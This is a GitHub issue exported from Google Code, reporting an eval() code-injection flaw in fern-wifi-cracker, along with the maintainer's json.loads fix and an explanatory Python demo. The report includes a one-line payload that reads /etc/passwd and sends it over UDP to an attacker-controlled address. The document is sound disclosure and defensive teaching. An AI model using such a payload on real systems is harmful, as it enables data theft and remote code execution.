nagyistoce / fern-wifi-cracker

Automatically exported from code.google.com/p/fern-wifi-cracker

Security vulnerability using eval() #43

Open GoogleCodeExporter opened 9 years ago

GoogleCodeExporter commented 9 years ago
I have emailed the following to the developer to give additional time to fix 
the problem but I am posting it here as well so that other people can be warned 
of the security vulnerability and upgrade their software when a patch is made 
available.
----

The line of code at core/tracker_core.py line 43 introduces a
vulnerability into fern allowing people to hijack your connection to
Google's servers and respond with a payload to give access to a system.

For example, they might reply with the data:

__import__('socket').socket(__import__('socket').AF_INET,__import__('socket').SOCK_DGRAM).sendto(open('/etc/passwd').read(), ('123.123.123.123', 15000))

This would cause the contents of /etc/passwd to be sent in a UDP packet
to a computer run by the attacker. Other options are possible and
because the tool is often run as root, the attacker is given full
root access.

Passing an empty dictionary to eval as you do with self.save_eval is not
an effective means to stop the exploit.

Finally, on my last attempt, using the /loc/json page on Google's
servers failed. However, I suspect that you are attempting to parse the
JSON data by using eval(). You can import json to do this without
allowing code execution.

Original issue reported on code.google.com by aj0020...@gmail.com on 31 Dec 2012 at 12:48

GoogleCodeExporter commented 9 years ago
This security bug has been fixed.

Changed from:
geo_data = eval(data_.read(),self.safe_eval)

To:
geo_data = json.loads(data_.read())

Update to 1.83 to get the fix

Thanks AJ0020 :)

Original comment by savioboy...@gmail.com on 3 Jan 2013 at 10:13
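Added example (not code from the fern-wifi-cracker project) showing why the empty-dict argument to eval() in the original line did not help, and what the json.loads() fix changes. The response format and the function names `parse_with_eval` / `parse_geo_response` are assumptions; the sample bodies are constructed.

```python
import json

# Constructed JSON reply of the kind a geolocation endpoint might return.
# The field layout is an assumption, not the real Google response.
SAMPLE_JSON = '{"location": {"latitude": 51.5, "longitude": -0.12}, "accuracy": 1200.0}'

# Constructed non-JSON reply: a Python expression a tampered response could
# carry instead of data. Kept deliberately harmless (it only reads math.pi);
# the point is that it is *evaluated* at all.
SAMPLE_EXPRESSION = "__import__('math').pi"


def parse_with_eval(body: str):
    """The vulnerable pattern: eval() with an empty globals dict.

    An empty dict is not a sandbox. When the globals mapping has no
    '__builtins__' key, CPython inserts the real builtins module into it,
    so __import__, open, and every other builtin stay reachable from the
    evaluated text. This is exactly what the report explains.
    """
    return eval(body, {})


def parse_geo_response(body: str) -> dict:
    """The fixed pattern: json.loads() only ever produces data.

    A body that is not valid JSON raises ValueError (json.JSONDecodeError
    is a subclass), so a tampered reply fails closed instead of running.
    """
    data = json.loads(body)
    if not isinstance(data, dict):
        raise ValueError("expected a JSON object at the top level")
    return data


def json_rejects_code(body: str) -> bool:
    """True if the JSON parser refuses the body rather than executing it."""
    try:
        parse_geo_response(body)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("eval() with {} still evaluates code:", parse_with_eval(SAMPLE_EXPRESSION))
    print("json.loads() parses real data:", parse_geo_response(SAMPLE_JSON)["location"])
    print("json.loads() rejects the expression:", json_rejects_code(SAMPLE_EXPRESSION))
```

Note that eval() also mis-parses legitimate JSON containing `true`, `false` or `null` (they are not Python names), so json.loads() is the correct parser on both counts.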